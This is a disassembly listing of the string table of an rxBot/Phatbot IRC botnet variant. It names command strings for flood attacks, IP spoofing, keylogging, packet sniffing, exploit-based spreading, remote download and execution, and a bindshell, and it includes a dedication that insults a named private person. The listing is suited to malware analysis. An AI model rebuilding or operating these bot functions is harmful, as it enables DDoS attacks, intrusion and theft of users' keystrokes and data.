aPortscan db 'portscan',0 ; DATA XREF: sub_40274D+4CE1�o
align 4
; char aC_a[]
aC_a db 'c_a',0 ; DATA XREF: sub_40274D+4CBB�o
; char aC_action[]
aC_action db 'c_action',0 ; DATA XREF: sub_40274D+4CA4�o
align 4
; char aC_pm[]
aC_pm db 'c_pm',0 ; DATA XREF: sub_40274D+4C8D�o
align 10h
; char aC_privmsg[]
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_40274D+4C76�o
align 4
; char aSc[]
aSc db 'sc',0 ; DATA XREF: sub_40274D+4C5F�o
align 10h
; char aScan_0[]
aScan_0 db 'scan',0 ; DATA XREF: sub_40274D+4C48�o
align 4
; char aRd[]
aRd db 'rd',0 ; DATA XREF: sub_40274D+4C31�o
align 4
; char aRedirect[]
aRedirect db 'redirect',0 ; DATA XREF: sub_40274D+4C1A�o
align 4
; char aDl[]
aDl db 'dl',0 ; DATA XREF: sub_40274D+4C03�o
align 4
; char aDownload[]
aDownload db 'download',0 ; DATA XREF: sub_40274D+4BEC�o
align 4
; char aWonk[]
aWonk db 'wonk',0 ; DATA XREF: sub_40274D+4BD5�o
align 10h
; char aPhatwonk[]
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_40274D+4BBE�o
align 4
dword_42DF5C dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_40274D+4B9C�o
aFailedToSta_13 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42DF98[]
asc_42DF98 db '-' ; DATA XREF: sub_40274D+4B3A�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
; char aSkysyn[]
aSkysyn db 'skysyn',0 ; DATA XREF: sub_40274D+4AC3�o
align 10h
; char aSyn[]
aSyn db 'syn',0 ; DATA XREF: sub_40274D+4AAC�o
; sub_40274D+500C�o ...
; char aSynflood[]
aSynflood db 'synflood',0 ; DATA XREF: sub_40274D+4A95�o
align 10h
unk_42DFE0 db 2Dh ; - ; DATA XREF: sub_40274D+4A73�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_14 db '- Failed to start flood thread, error: <%d>.',0
align 10h
; char aWisdom_udp[]
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_40274D+49B5�o
align 4
; char aDdos_random[]
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_40274D+499E�o
; sub_415825:loc_41594D�o
; char aDdos_ack[]
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_40274D+4987�o
; sub_415825:loc_415931�o
align 4
; char aDdos_syn[]
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_40274D+4970�o
; sub_415825+ED�o
align 10h
; char aC[]
aC: ; DATA XREF: sub_40274D+4959�o
; sub_40FDC3+78�o ...
unicode 0, <c>,0
; char aClone_0[]
aClone_0 db 'clone',0 ; DATA XREF: sub_40274D+4942�o
align 4
; char aIcmp[]
aIcmp db 'icmp',0 ; DATA XREF: sub_40274D+491C�o
align 4
; char aIcmpflood[]
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_40274D+4905�o
align 10h
; char aMv[]
aMv db 'mv',0 ; DATA XREF: sub_40274D+48EE�o
align 4
; char aRename[]
aRename db 'rename',0 ; DATA XREF: sub_40274D+48D7�o
align 4
; char aFf[]
aFf db 'ff',0 ; DATA XREF: sub_40274D+48C0�o
align 10h
; char aFindfile[]
aFindfile db 'findfile',0 ; DATA XREF: sub_40274D+48A9�o
align 4
; char aE[]
aE: ; DATA XREF: sub_40274D+4892�o
; .data:00442ED8�o ...
unicode 0, <e>,0
; char aExecute[]
aExecute db 'execute',0 ; DATA XREF: sub_40274D+487B�o
; char aUpdate[]
aUpdate db 'update',0 ; DATA XREF: sub_40274D+484D�o
align 10h
; char aDe[]
aDe db 'de',0 ; DATA XREF: sub_40274D+4836�o
align 4
; char aDelay[]
aDelay db 'delay',0 ; DATA XREF: sub_40274D+481F�o
align 4
; char aRp[]
aRp db 'rp',0 ; DATA XREF: sub_40274D+4808�o
align 10h
; char aRepeat[]
aRepeat db 'repeat',0 ; DATA XREF: sub_40274D+47F1�o
; sub_40274D+68A6�o
align 4
; char aTsn[]
aTsn db 'tsn',0 ; DATA XREF: sub_40274D+47DA�o
; char aTsunami[]
aTsunami db 'tsunami',0 ; DATA XREF: sub_40274D+47C3�o
; char aT3[]
aT3 db 't3',0 ; DATA XREF: sub_40274D+47AC�o
align 4
; char aTarga3[]
aTarga3 db 'targa3',0 ; DATA XREF: sub_40274D+4795�o
align 10h
; char aC_p[]
aC_p db 'c_p',0 ; DATA XREF: sub_40274D+477E�o
; char aC_part[]
aC_part db 'c_part',0 ; DATA XREF: sub_40274D+4767�o
align 4
; char aC_j[]
aC_j db 'c_j',0 ; DATA XREF: sub_40274D+4750�o
; char aC_join[]
aC_join db 'c_join',0 ; DATA XREF: sub_40274D+4739�o
align 4
; char aC_n[]
aC_n db 'c_n',0 ; DATA XREF: sub_40274D+4722�o
; char aC_nick[]
aC_nick db 'c_nick',0 ; DATA XREF: sub_40274D+470B�o
align 4
; char aC_m[]
aC_m db 'c_m',0 ; DATA XREF: sub_40274D+46F4�o
; char aC_mode[]
aC_mode db 'c_mode',0 ; DATA XREF: sub_40274D+46DD�o
align 10h
; char aC_r[]
aC_r db 'c_r',0 ; DATA XREF: sub_40274D+46C6�o
; char aC_raw[]
aC_raw db 'c_raw',0 ; DATA XREF: sub_40274D+46AF�o
align 4
; char aM_0[]
aM_0: ; DATA XREF: sub_40274D+4698�o
; .data:00442F30�o ...
unicode 0, <m>,0
; char aCy[]
aCy db 'cy',0 ; DATA XREF: sub_40274D+466A�o
align 4
; char aCycle[]
aCycle db 'cycle',0 ; DATA XREF: sub_40274D+4653�o
align 4
; char aA[]
aA: ; DATA XREF: sub_40274D+463C�o
; .data:00442EF4�o
unicode 0, <a>,0
; char aAction[]
aAction db 'action',0 ; DATA XREF: sub_40274D+4625�o
align 4
; char aPrivmsg_0[]
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_40274D+45F7�o
; char aAa[]
aAa db 'aa',0 ; DATA XREF: sub_40274D+45E0�o
align 4
; char aAddalias[]
aAddalias db 'addalias',0 ; DATA XREF: sub_40274D+45C9�o
align 10h
; char aKl[]
aKl db 'kl',0 ; DATA XREF: sub_40274D+45B2�o
align 4
; char aKilllog[]
aKilllog db 'killlog',0 ; DATA XREF: sub_40274D+459B�o
; char aGh[]
aGh db 'gh',0 ; DATA XREF: sub_40274D+4575�o
align 10h
; char aGethost[]
aGethost db 'gethost',0 ; DATA XREF: sub_40274D+4560�o
; char aCap[]
aCap db 'cap',0 ; DATA XREF: sub_40274D+454B�o
; char aCapture[]
aCapture db 'capture',0 ; DATA XREF: sub_40274D+4536�o
; char asc_42E164[]
asc_42E164 db '-' ; DATA XREF: sub_40274D:loc_406C3A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_42E180 db 2Dh ; - ; DATA XREF: sub_40274D:loc_406C33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
unk_42E1A4 db 2Dh ; - ; DATA XREF: sub_40274D:loc_406BED�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 4
unk_42E1C4 db 2Dh ; - ; DATA XREF: sub_40274D+4499�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_42E1E4 db 2Dh ; - ; DATA XREF: sub_40274D:loc_406B62�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
unk_42E204 db 2Dh ; - ; DATA XREF: sub_40274D+440B�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 4
; char aShare[]
aShare db 'share',0 ; DATA XREF: sub_40274D+43A8�o
align 10h
; char aContinue[]
aContinue db 'continue',0 ; DATA XREF: sub_40274D+436E�o
align 4
; char aPause[]
aPause db 'pause',0 ; DATA XREF: sub_40274D+4351�o
align 4
; char aStop[]
aStop db 'stop',0 ; DATA XREF: sub_40274D+4337�o
align 4
unk_42E24C db 2Dh ; - ; DATA XREF: sub_40274D:loc_406A77�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
unk_42E26C db 2Dh ; - ; DATA XREF: sub_40274D+4320�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 10h
; char aStart[]
aStart db 'start',0 ; DATA XREF: sub_40274D+42CD�o
align 4
unk_42E298 db 2Dh ; - ; DATA XREF: sub_40274D+429E�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
; char aNet[]
aNet db 'net',0 ; DATA XREF: sub_40274D+427A�o
; char asc_42E2D4[]
asc_42E2D4 db '-' ; DATA XREF: sub_40274D+422C�o
db 3, 34h, 2
dd 6C79656Bh, 302676Fh
aFailedToStartL db '- Failed to start logging thread, error: <%d>.',0
align 10h
; char asc_42E310[]
asc_42E310 db '-' ; DATA XREF: sub_40274D+41D3�o
db 3, 34h, 2
dd 6C79656Bh, 302676Fh
aKeyLoggerActiv db '- Key logger active.',0
align 4
dword_42E334 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D+415A�o
aAlreadyRunning db '- Already running.',0
align 4
dword_42E354 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D:loc_406891�o
aNoKeyLoggerThr db '- No key logger thread found.',0
align 10h
dword_42E380 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D+413A�o
aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0
align 4
; char aFile[]
aFile db 'file',0 ; DATA XREF: sub_40274D+40FE�o
align 4
; char aKeylog[]
aKeylog db 'keylog',0 ; DATA XREF: sub_40274D+40D9�o
align 4
dword_42E3CC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D:loc_40681B�o
aNoThreadFound_ db '- No thread found.',0
align 4
dword_42E3EC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D+40C4�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_42E424 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D+4094�o
aFailedToSta_15 db '- Failed to start server, error: <%d>.',0
align 4
; char asc_42E458[]
asc_42E458 db '-' ; DATA XREF: sub_40274D:loc_406794�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerRunningO db '- Server running on Port: 113.',0
align 4
dword_42E484 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D+403D�o
aAlreadyRunni_0 db '- Already running.',0
align 4
; char aIdent[]
aIdent db 'ident',0 ; DATA XREF: sub_40274D+4004�o
align 4
unk_42E4AC db 2Dh ; - ; DATA XREF: sub_40274D:loc_406746�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0
align 10h
unk_42E4E0 db 2Dh ; - ; DATA XREF: sub_40274D+3FEF�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0
unk_42E520 db 2Dh ; - ; DATA XREF: sub_40274D+3FAA�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_16 db '- Failed to start sniffer thread, error: <%d>.',0
; char asc_42E55C[]
asc_42E55C db '-' ; DATA XREF: sub_40274D+3F51�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotPacketS db '- Phatbot packet sniffer active.',0
align 4
unk_42E58C db 2Dh ; - ; DATA XREF: sub_40274D+3EF3�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_1 db '- Already running.',0
; char aSniffer[]
aSniffer db 'sniffer',0 ; DATA XREF: sub_40274D+3EBC�o
dword_42E5B4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D:loc_4065FE�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 10h
dword_42E5E0 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3EA7�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 4
dword_42E61C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3E62�o
aFailedToSta_17 db '- Failed to start sniffer thread, error: <%d>.',0
align 4
; char asc_42E658[]
asc_42E658 db '-' ; DATA XREF: sub_40274D+3E09�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 4
dword_42E688 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3DAB�o
aAlreadyRunni_2 db '- Already running.',0
align 4
; char aOn[]
aOn db 'on',0 ; DATA XREF: sub_40274D+3D8B�o
; sub_40274D+3ED3�o ...
align 4
; char aPsniff[]
aPsniff db 'psniff',0 ; DATA XREF: sub_40274D+3D74�o
align 4
; char aRf[]
aRf db 'rf',0 ; DATA XREF: sub_40274D+3D5F�o
align 4
; char aReadfile[]
aReadfile db 'readfile',0 ; DATA XREF: sub_40274D+3D4A�o
align 4
; char aCm[]
aCm db 'cm',0 ; DATA XREF: sub_40274D+3D35�o
align 4
; char aCmd[]
aCmd db 'cmd',0 ; DATA XREF: sub_40274D+3D20�o
; char aMirc[]
aMirc db 'mirc',0 ; DATA XREF: sub_40274D+3D0B�o
align 4
; char aMirccmd[]
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_40274D+3CF6�o
; char aV[]
aV: ; DATA XREF: sub_40274D+3CE1�o
; .data:00442F24�o ...
unicode 0, <v>,0
; char aVisit[]
aVisit db 'visit',0 ; DATA XREF: sub_40274D+3CCC�o
align 4
; char aLi[]
aLi db 'li',0 ; DATA XREF: sub_40274D+3CB7�o
align 4
; char aList[]
aList db 'list',0 ; DATA XREF: sub_40274D+3CA2�o
align 4
; char aGt[]
aGt db 'gt',0 ; DATA XREF: sub_40274D+3C8D�o
align 4
; char aDel[]
aDel db 'del',0 ; DATA XREF: sub_40274D+3C63�o
; char aDelete[]
aDelete db 'delete',0 ; DATA XREF: sub_40274D+3C4E�o
; sub_40274D+438B�o
align 4
; char aKi[]
aKi db 'ki',0 ; DATA XREF: sub_40274D+3C39�o
align 4
; char aKill[]
aKill db 'kill',0 ; DATA XREF: sub_40274D+3C24�o
align 10h
; char aKp[]
aKp db 'kp',0 ; DATA XREF: sub_40274D+3C0F�o
align 4
; char aKillproc[]
aKillproc db 'killproc',0 ; DATA XREF: sub_40274D+3BFA�o
align 10h
; char aDn[]
aDn db 'dn',0 ; DATA XREF: sub_40274D+3BE5�o
align 4
; char aDns[]
aDns db 'dns',0 ; DATA XREF: sub_40274D+3BD0�o
; char aSe[]
aSe db 'se',0 ; DATA XREF: sub_40274D+3BBB�o
align 4
; char aO[]
aO: ; DATA XREF: sub_40274D+3B91�o
; .data:00443254�o
unicode 0, <o>,0
; char aOpen[]
aOpen db 'open',0 ; DATA XREF: sub_40274D+3B7C�o
; sub_40274D+562A�o ...
align 4
; char aPr[]
aPr db 'pr',0 ; DATA XREF: sub_40274D+3B67�o
align 4
; char aPrefix[]
aPrefix db 'prefix',0 ; DATA XREF: sub_40274D+3B52�o
align 4
; char aC_rn[]
aC_rn db 'c_rn',0 ; DATA XREF: sub_40274D+3B3D�o
align 4
; char aC_rndnick[]
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_40274D+3B28�o
align 4
; char aC_q[]
aC_q db 'c_q',0 ; DATA XREF: sub_40274D+3B13�o
; char aC_quit[]
aC_quit db 'c_quit',0 ; DATA XREF: sub_40274D+3AFE�o
align 4
; char aK[]
aK: ; DATA XREF: sub_40274D+3AE9�o
; .data:00442F10�o ...
unicode 0, <k>,0
; char aKillthread[]
aKillthread db 'killthread',0 ; DATA XREF: sub_40274D+3AD4�o
align 4
; char aRaw[]
aRaw db 'raw',0 ; DATA XREF: sub_40274D+3AAA�o
; char aPt[]
aPt db 'pt',0 ; DATA XREF: sub_40274D+3A95�o
align 4
; char aJ[]
aJ: ; DATA XREF: sub_40274D+3A6B�o
; .data:00442F0C�o ...
unicode 0, <j>,0
; char aN[]
aN: ; DATA XREF: sub_40274D+3A41�o
; .data:00442F2C�o ...
unicode 0, <n>,0
unk_42E784 db 2Dh ; - ; DATA XREF: sub_40274D+3A10�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
; char aNickservRegist[]
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_40274D+39AC�o
; char aRegister[]
aRegister db 'register',0 ; DATA XREF: sub_40274D+3989�o
align 10h
; char aPrivmsgSS_0[]
aPrivmsgSS_0 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_40274D+3933�o
align 10h
; char aMix[]
aMix db 'mix',0 ; DATA XREF: sub_40274D+3878�o
; char aPrivmsgS_3[]
aPrivmsgS_3 db 'PRIVMSG %s :' ; DATA XREF: sub_40274D+3827�o
; sub_40274D+385B�o
dd 6E696601h, 1726567h, 0
; char aPrivmsgS_2[]
aPrivmsgS_2 db 'PRIVMSG %s :' ; DATA XREF: sub_40274D+37F3�o
dd 72657601h, 6E6F6973h, 1
; char aPrivmsgS_1[]
aPrivmsgS_1 db 'PRIVMSG %s :' ; DATA XREF: sub_40274D+37BF�o
; sub_40274D+38C1�o
dd 6E697001h, 167h
; char aCtcp[]
aCtcp db 'ctcp',0 ; DATA XREF: sub_40274D+3776�o
align 10h
; char aNoticeSS_1[]
aNoticeSS_1 db 'NOTICE %s :%s',0 ; DATA XREF: sub_40274D+36E7�o
; sub_40274D+3720�o ...
align 10h
; char aNotice_0[]
aNotice_0 db 'notice',0 ; DATA XREF: sub_40274D+3699�o
align 4
; char aMsg[]
aMsg db 'msg',0 ; DATA XREF: sub_40274D+35BC�o
; char aChgnick[]
aChgnick db 'chgnick',0 ; DATA XREF: sub_40274D+3576�o
; char aNick_0[]
aNick_0 db 'nick',0 ; DATA XREF: sub_40274D+347C�o
; sub_40274D+3A2C�o
align 4
; char aPrivmsgS_0[]
aPrivmsgS_0 db 'PRIVMSG %s :' ; DATA XREF: sub_40274D+345F�o
dd 43434401h, 4E455320h, 64252044h, 2064252Eh, 25206425h
dd 64252064h, 1
; char aDcc[]
aDcc db 'dcc',0 ; DATA XREF: sub_40274D+33EC�o
; char aJoinPart[]
aJoinPart db 'join/part',0 ; DATA XREF: sub_40274D+32BA�o
align 4
; char aNickS_0[]
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_40274D+329D�o
; sub_40274D+34D3�o ...
; char aSI[]
aSI db '%s%i',0 ; DATA XREF: sub_40274D+3285�o
; sub_40A800+4E�o ...
align 4
; char aPnick[]
aPnick db 'pnick',0 ; DATA XREF: sub_40274D+324B�o
align 4
; char aPartSS[]
aPartSS db 'part %s %s',0 ; DATA XREF: sub_40274D+322E�o
; sub_40274D+3308�o ...
align 4
; char aPartflood[]
aPartflood db 'partflood',0 ; DATA XREF: sub_40274D+320A�o
align 4
; char aPartS[]
aPartS db 'part %s',0 ; DATA XREF: sub_40274D+31ED�o
; char aPart_0[]
aPart_0 db 'part',0 ; DATA XREF: sub_40274D+31CE�o
; sub_40274D+3A80�o
align 4
; char aJoinS[]
aJoinS db 'join %s',0 ; DATA XREF: sub_40274D+31B1�o
; sub_40274D+32E2�o ...
; char aJoin[]
aJoin db 'join',0 ; DATA XREF: sub_40274D+3192�o
; sub_40274D+3A56�o
align 4
; char aModeSS[]
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_40274D+3175�o
align 10h
; char aMode[]
aMode db 'mode',0 ; DATA XREF: sub_40274D+312F�o
; sub_40274D+4681�o
align 4
; char aNoticeSS_0[]
aNoticeSS_0 db 'notice %s :%s',0 ; DATA XREF: sub_40274D+3112�o
align 4
; char aNt[]
aNt db 'nt',0 ; DATA XREF: sub_40274D+30CC�o
align 4
; char aPrivmsgS[]
aPrivmsgS db 'privmsg %s :' ; DATA XREF: sub_40274D+30AF�o
dd 1732501h, 0
; char aCt[]
aCt db 'ct',0 ; DATA XREF: sub_40274D+3069�o
align 4
; char aPrivmsgSS[]
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_40274D+304C�o
; sub_40274D+360A�o ...
align 4
; char a_[]
a_: ; DATA XREF: sub_40274D+3023�o
; sub_40274D+3086�o ...
unicode 0, <_>,0
; char aPm[]
aPm db 'pm',0 ; DATA XREF: sub_40274D+3006�o
; sub_40274D+460E�o
align 4
; char asc_42E93C[]
asc_42E93C db '-' ; DATA XREF: sub_40274D+2FD7�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aSClonesLoadedT db '- %s clones loaded to %s:%s',0
align 4
; char aLoad[]
aLoad db 'load',0 ; DATA XREF: sub_40274D+2F8F�o
align 10h
; char aFlood[]
aFlood db 'flood',0 ; DATA XREF: sub_40274D+2F66�o
align 4
; char aRinms[]
aRinms db 'rinms',0 ; DATA XREF: sub_40274D+2F4F�o
align 10h
; char aReconnect_in_m[]
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_40274D+2F3A�o
; char aRin[]
aRin db 'rin',0 ; DATA XREF: sub_40274D+2F25�o
; char aReconnect_in[]
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_40274D+2F10�o
align 4
unk_42E9A4 db 2Dh ; - ; DATA XREF: sub_40274D+2EF0�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
; char asc_42E9E4[]
asc_42E9E4 db '-' ; DATA XREF: sub_40274D+2E94�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
; char aExploit[]
aExploit db 'exploit',0 ; DATA XREF: sub_40274D+2E17�o
; char asc_42EA1C[]
asc_42EA1C db '-' ; DATA XREF: sub_40274D+2DF9�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 4
; char asc_42EA48[]
asc_42EA48 db '-' ; DATA XREF: sub_40274D+2DCF�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
; char aD_D_D_[]
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_40274D+2D97�o
align 4
; char asc_42EA88[]
asc_42EA88 db '-' ; DATA XREF: sub_40274D+2D3E�o
; sub_40274D+2DAF�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 10h
; char aGet_1[]
aGet_1 db 'get',0 ; DATA XREF: sub_40274D:loc_405469�o
; sub_40274D+3C78�o
unk_42EAC4 db 2Dh ; - ; DATA XREF: sub_40274D+2CB0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aInvalidLoginSl db 'Invalid login slot number: %d.',0
align 10h
unk_42EAF0 db 2Dh ; - ; DATA XREF: sub_40274D+2CA5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNoUserLoggedIn db 'No user logged in at slot: %d.',0
align 4
dword_42EB1C dd 234032Dh, 6E69616Dh, 202D0302h, 7325h, 0 ; DATA XREF: sub_40274D+2C57�o
unk_42EB30 db 2Dh ; - ; DATA XREF: sub_40274D:loc_405395�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir'
db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress '
db 'from Hell?) who I love so much.',0
align 10h
dword_42EBE0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_40274D+2C16�o
aFailedToSta_18 db '- Failed to start secure thread, error: <%d>.',0
align 4
; char asc_42EC1C[]
asc_42EC1C db '-' ; DATA XREF: sub_40274D+2BB2�o
db 3, 34h, 2
dd 75636573h, 3026572h, 7325202Dh, 73797320h, 2E6D6574h
dd 0
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40274D+2BAC�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_40274D+2BA5�o
align 10h
unk_42EC50 db 2Dh ; - ; DATA XREF: sub_40274D+2B1C�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToSta_19 db ' Failed to start server thread, error: <%d>.',0
align 10h
; char asc_42EC90[]
asc_42EC90 db '-' ; DATA XREF: sub_40274D+2AB1�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 4
dword_42ECBC dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_40274D+2A20�o
aFailedToSta_20 db '- Failed to start server thread, error: <%d>.',0
align 4
; char asc_42ECF8[]
asc_42ECF8 db '-' ; DATA XREF: sub_40274D+29C7�o
; sub_4144B2+A4�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_42ED20 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_40274D+2909�o
aFindFile db 'Find file',0 ; DATA XREF: sub_40274D+2904�o
align 4
dword_42ED3C dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_40274D+28F7�o
aProcessList db 'Process list',0 ; DATA XREF: sub_40274D+28F2�o
align 4
dword_42ED5C dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh
; DATA XREF: sub_40274D+288C�o
dd 676E6974h, 2Eh
; char aQuitReconnecti[]
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40274D:loc_404FCC�o
; sub_40274D:loc_409FE3�o ...
align 10h
dword_42ED90 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh
; DATA XREF: sub_40274D+286A�o
dd 6E697463h, 2E67h
; char aQuitDisconnect[]
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40274D:loc_404FAA�o
align 4
; char aQuitLater[]
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40274D:loc_404F93�o
; sub_40274D+76C8�o
align 4
; char aQuitS[]
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40274D+2834�o
align 10h
; char asc_42EDE0[]
asc_42EDE0 db '-' ; DATA XREF: sub_40274D+27EE�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0
align 4
; char asc_42EE0C[]
asc_42EE0C db '-' ; DATA XREF: sub_40274D+27B3�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 20746F42h, 203A4449h, 2E7325h
unk_42EE24 db 2Dh ; - ; DATA XREF: sub_40274D+2789�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToSta_21 db '- Failed to start list thread, error: <%d>.',0
align 10h
; char asc_42EE60[]
asc_42EE60 db '-' ; DATA XREF: sub_40274D+2730�o
db 3, 34h, 2
dd 65726874h, 2736461h, 4C202D03h, 20747369h, 65726874h
dd 2E736461h, 0
; char aSub[]
aSub db 'sub',0 ; DATA XREF: sub_40274D+270A�o
dword_42EE84 dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h
; DATA XREF: sub_40274D+26C1�o
dd 2E7473h
unk_42EE9C db 2Dh ; - ; DATA XREF: sub_40274D+2694�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToSta_22 db '- Failed to start listing thread, error: <%d>.',0
; char asc_42EED4[]
